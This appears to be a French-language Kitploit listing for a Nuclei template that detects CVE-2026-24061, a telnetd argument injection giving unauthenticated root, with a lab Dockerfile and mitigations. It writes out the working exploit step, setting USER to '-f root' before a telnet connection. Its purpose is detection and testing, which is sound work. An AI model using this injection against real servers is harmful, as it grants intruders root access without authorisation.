Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-24061 — Modèle Nuclei pour détecter CVE-2026-24061, une injection critique d'arguments telnet dans GNU inetutils telnetd permettant un accès root non authentifié. | Kitploit
Outils/GitHubGitHub/mr-zapi/cve-2026-24061
Scanners de VulnérabilitésExploitationExploitation d'Applications WebSécurité RéseauTests d'IntrusionApprentissage et Éducation
GitHubmr-zapi/cve-2026-24061

CVE-2026-24061

Modèle Nuclei pour détecter CVE-2026-24061, une injection critique d'arguments telnet dans GNU inetutils telnetd permettant un accès root non authentifié.

Voir le dépôt
1il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-24061 - Injection d'arguments Telnet

Modèle Nuclei pour la détection de la vulnérabilité CVE-2026-24061 dans GNU inetutils telnetd, permettant d'obtenir un accès root sans authentification.

📋 Description de la vulnérabilité

CVE-2026-24061 est une vulnérabilité critique d'injection d'arguments dans GNU inetutils telnetd, qui permet à un attaquant d'obtenir un shell root sans connaître le mot de passe.

Comment cela fonctionne-t-il ?

  1. Racine du problème : En 2015, un nouveau modèle de connexion avec le paramètre dynamique %U a été ajouté à telnetd :
root@kitploit:~
   /usr/bin/login -p -h %h %?u{-f %u}{%U}
  1. Vulnérabilité : La variable d'environnement USER est transmise via le protocole telnet (RFC 1572 NEW-ENVIRON) et n'est pas assainie avant d'être insérée dans la commande.

  2. Exploitation : L'attaquant définit USER="-f root" lors de la connexion :

root@kitploit:~
   USER="-f root" telnet -a target.com 23
  1. Résultat : La commande de connexion devient :
root@kitploit:~
   /usr/bin/login -p -h hostname -f root

Le drapeau -f signifie "skip authentication" → root sans mot de passe 💀

🎯 Versions concernées

  • GNU inetutils telnetd avec le modèle de connexion vulnérable
  • Par exemple : inetutils-telnetd 2:2.0-1+deb11u2
  • Systèmes où telnetd utilise l'authentification automatique sans Kerberos

🚀 Utilisation

Analyse de base

root@kitploit:~
nuclei -t cve-2026-24061.yaml -u target.com:23 -code

Cibles multiples

root@kitploit:~
nuclei -t cve-2026-24061.yaml -l targets.txt -code

🔬 Laboratoire de test

Pour tester, vous pouvez déployer un conteneur Docker vulnérable :

root@kitploit:~
FROM debian:11-slim

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && \
    apt-get install -y --no-install-recommends \
      inetutils-telnetd=2:2.0-1+deb11u2 \
      telnet && \
    rm -rf /var/lib/apt/lists/*

RUN useradd user1 && \
    sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf

EXPOSE 23

CMD ["/usr/sbin/inetutils-inetd", "-d"]

Lancement :

root@kitploit:~
# Construire l'image
docker build -t vuln-telnetd .

# Lancer
docker run -d -p 2323:23 vuln-telnetd

# Vérifier la vulnérabilité
nuclei -t cve-2026-24061.yaml -u 127.0.0.1:2323 -code -v

🛡️ Protection

  1. Mettre à jour inetutils vers la version corrigée
  2. Désactiver telnetd et utiliser SSH
  3. Filtrer le port 23 sur le pare-feu
  4. Surveiller les connexions telnet

📚 Liens

  • NVD - CVE-2026-24061
  • SafeBreach Labs - Root Cause Analysis

📊 Score CVSS

9.8 / 10 - Critique

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • AV:N - Réseau (attaque par le réseau)
  • AC:L - Complexité faible (facile à exploiter)
  • PR:N - Aucun privilège requis (pas d'authentification nécessaire)
  • UI:N - Aucune interaction utilisateur (exploitation automatique)
  • C:H/I:H/A:H - Impact élevé sur la confidentialité, l'intégrité et la disponibilité

⚠️ Avertissement

Cet outil est destiné uniquement aux tests de sécurité légaux sur des systèmes pour lesquels vous disposez d'une autorisation explicite.

L'auteur décline toute responsabilité en cas d'utilisation abusive de ce modèle.

👤 Auteur

Créé par Mr.Zapi

Télécharger l’outil